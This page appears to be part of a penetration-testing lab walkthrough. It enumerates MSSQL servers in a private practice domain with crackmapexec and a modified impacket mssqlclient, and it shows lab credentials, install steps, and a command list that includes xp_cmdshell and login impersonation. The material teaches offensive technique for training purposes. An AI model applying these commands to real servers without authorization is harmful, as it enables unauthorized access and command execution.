Enumerate MSSQL servers with CrackMap & Impacket

CrackMapExec

  • Let’s try with crackmapexec

crackmapexec mssql 192.168.56.22-23

  • Now we could try with the user miguel.ortiz

crackmapexec mssql 192.168.56.22 -u miguel.cabrera -p ilovebaseball -d north.newyork.local

  • As we can see we got an access to the database

Impacket

  • To enumerate and use impacket mssql, i made a modified version of the example mssqlclient.py.

  • You can find the version here

  • The install is just like what we done in part5 merge the PR on your local impacket project and relaunch install:

cd /opt/tools
git clone https://github.com/SecureAuthCorp/impacket myimpacket
cd myimpacket
python3 -m virtualenv myimpacket
source myimpacket/bin/activate
git fetch origin pull/1397/head:1397
git merge 1397
python3 -m pip install .

  • We connect to the mssql server with the following command :

mssqlclient.py -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local

  • And type help:

   lcd {path}                 - changes the current local directory to {path}
   exit                       - terminates the server process (and this session)
   enable_xp_cmdshell         - you know what it means
   disable_xp_cmdshell        - you know what it means
   enum_db                    - enum databases
   enum_links                 - enum linked servers
   enum_impersonate           - check logins that can be impersonate
   enum_logins                - enum login users
   enum_users                 - enum current db users
   enum_owner                 - enum db owner
   exec_as_user {user}        - impersonate with execute as user
   exec_as_login {login}      - impersonate with execute as login
   xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
   xp_dirtree {path}          - executes xp_dirtree on the path
   sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
   use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
   ! {cmd}                    - executes a local shell cmd
   show_query                 - show query
   mask_query                 - mask query

  • I added some new entries to the database : enum_db/enum_links/enum_impersonate/enum_login/enum_owner/exec_as_user/exec_as_login/use_link/show_query/mask_query

  • Let’s start the enumeration :

enum_logins

  • This launch the following query (roles value meaning can be show here)

select r.name,r.type_desc,r.is_disabled, sl.sysadmin, sl.securityadmin, 
sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin 
from  master.sys.server_principals r 
left join master.sys.syslogins sl on sl.sid = r.sid 
where r.type in ('S','E','X','U','G')

  • We see only a basic view as we are a simple user

PreviousEnumerate MSSQL servers with GetUserSPNs & NMAPNextimpersonate - execute as login

Last updated